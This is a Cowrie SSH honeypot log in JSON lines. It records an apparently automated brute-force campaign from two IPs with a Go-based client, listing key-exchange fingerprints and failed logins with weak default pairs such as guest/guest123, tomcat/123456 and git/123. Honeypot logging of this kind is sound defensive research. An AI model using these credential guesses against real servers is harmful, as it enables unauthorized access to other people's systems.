{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51412,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6066243bfe7","protocol":"ssh","message":"New connection: 212.227.235.229:51412 (1.2.3.4:22) [session: f6066243bfe7]","sensor":"my-vps","timestamp":"2025-08-28T07:05:26.524828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:26.525779Z","src_ip":"212.227.235.229","session":"f6066243bfe7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:05:26.774383Z","src_ip":"212.227.235.229","session":"f6066243bfe7"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:05:27.522565Z","src_ip":"212.227.235.229","session":"f6066243bfe7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:28.774123Z","src_ip":"212.227.235.229","session":"f6066243bfe7"}
{"eventid":"cowrie.session.closed","duration":37.481362104415894,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:33.956986Z","src_ip":"8.222.212.69","session":"ca94f6111b9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40336,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fa87eb45c02","protocol":"ssh","message":"New connection: 212.227.125.160:40336 (1.2.3.4:22) [session: 9fa87eb45c02]","sensor":"my-vps","timestamp":"2025-08-28T07:05:36.473595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:36.502840Z","src_ip":"212.227.125.160","session":"9fa87eb45c02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:05:36.706706Z","src_ip":"212.227.125.160","session":"9fa87eb45c02"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:05:38.175393Z","src_ip":"212.227.125.160","session":"9fa87eb45c02"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:39.393989Z","src_ip":"212.227.125.160","session":"9fa87eb45c02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35810,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f420f4f2e90","protocol":"ssh","message":"New connection: 212.227.235.229:35810 (1.2.3.4:22) [session: 6f420f4f2e90]","sensor":"my-vps","timestamp":"2025-08-28T07:05:43.133063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:43.134210Z","src_ip":"212.227.235.229","session":"6f420f4f2e90"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:05:43.384700Z","src_ip":"212.227.235.229","session":"6f420f4f2e90"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:05:44.156749Z","src_ip":"212.227.235.229","session":"6f420f4f2e90"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:45.410046Z","src_ip":"212.227.235.229","session":"6f420f4f2e90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38236,"dst_ip":"1.2.3.4","dst_port":22,"session":"642efd82cda3","protocol":"ssh","message":"New connection: 212.227.125.160:38236 (1.2.3.4:22) [session: 642efd82cda3]","sensor":"my-vps","timestamp":"2025-08-28T07:05:53.301214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:53.301883Z","src_ip":"212.227.125.160","session":"642efd82cda3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:05:53.526790Z","src_ip":"212.227.125.160","session":"642efd82cda3"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:05:54.198183Z","src_ip":"212.227.125.160","session":"642efd82cda3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:05:55.424979Z","src_ip":"212.227.125.160","session":"642efd82cda3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37110,"dst_ip":"1.2.3.4","dst_port":22,"session":"a213203c0372","protocol":"ssh","message":"New connection: 212.227.235.229:37110 (1.2.3.4:22) [session: a213203c0372]","sensor":"my-vps","timestamp":"2025-08-28T07:05:59.902640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:05:59.903448Z","src_ip":"212.227.235.229","session":"a213203c0372"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:00.158137Z","src_ip":"212.227.235.229","session":"a213203c0372"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:06:00.923939Z","src_ip":"212.227.235.229","session":"a213203c0372"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:02.180969Z","src_ip":"212.227.235.229","session":"a213203c0372"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60220,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d85d9766256","protocol":"ssh","message":"New connection: 212.227.125.160:60220 (1.2.3.4:22) [session: 1d85d9766256]","sensor":"my-vps","timestamp":"2025-08-28T07:06:09.998569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:10.000237Z","src_ip":"212.227.125.160","session":"1d85d9766256"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:10.215473Z","src_ip":"212.227.125.160","session":"1d85d9766256"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:06:10.864441Z","src_ip":"212.227.125.160","session":"1d85d9766256"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:12.082411Z","src_ip":"212.227.125.160","session":"1d85d9766256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37692,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc3065c663ef","protocol":"ssh","message":"New connection: 212.227.235.229:37692 (1.2.3.4:22) [session: bc3065c663ef]","sensor":"my-vps","timestamp":"2025-08-28T07:06:16.744692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:16.745658Z","src_ip":"212.227.235.229","session":"bc3065c663ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:16.991249Z","src_ip":"212.227.235.229","session":"bc3065c663ef"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:06:17.730348Z","src_ip":"212.227.235.229","session":"bc3065c663ef"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:18.978438Z","src_ip":"212.227.235.229","session":"bc3065c663ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44194,"dst_ip":"1.2.3.4","dst_port":22,"session":"73059c8060f9","protocol":"ssh","message":"New connection: 212.227.125.160:44194 (1.2.3.4:22) [session: 73059c8060f9]","sensor":"my-vps","timestamp":"2025-08-28T07:06:26.721975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:26.722907Z","src_ip":"212.227.125.160","session":"73059c8060f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:26.955949Z","src_ip":"212.227.125.160","session":"73059c8060f9"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:06:27.657445Z","src_ip":"212.227.125.160","session":"73059c8060f9"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:28.894348Z","src_ip":"212.227.125.160","session":"73059c8060f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54452,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c235a66eeb1","protocol":"ssh","message":"New connection: 212.227.235.229:54452 (1.2.3.4:22) [session: 3c235a66eeb1]","sensor":"my-vps","timestamp":"2025-08-28T07:06:33.278083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:33.278960Z","src_ip":"212.227.235.229","session":"3c235a66eeb1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:33.527823Z","src_ip":"212.227.235.229","session":"3c235a66eeb1"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:06:34.277299Z","src_ip":"212.227.235.229","session":"3c235a66eeb1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:35.529195Z","src_ip":"212.227.235.229","session":"3c235a66eeb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54592,"dst_ip":"1.2.3.4","dst_port":22,"session":"c57705ee0b82","protocol":"ssh","message":"New connection: 212.227.125.160:54592 (1.2.3.4:22) [session: c57705ee0b82]","sensor":"my-vps","timestamp":"2025-08-28T07:06:43.088428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:43.089382Z","src_ip":"212.227.125.160","session":"c57705ee0b82"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:43.314764Z","src_ip":"212.227.125.160","session":"c57705ee0b82"}
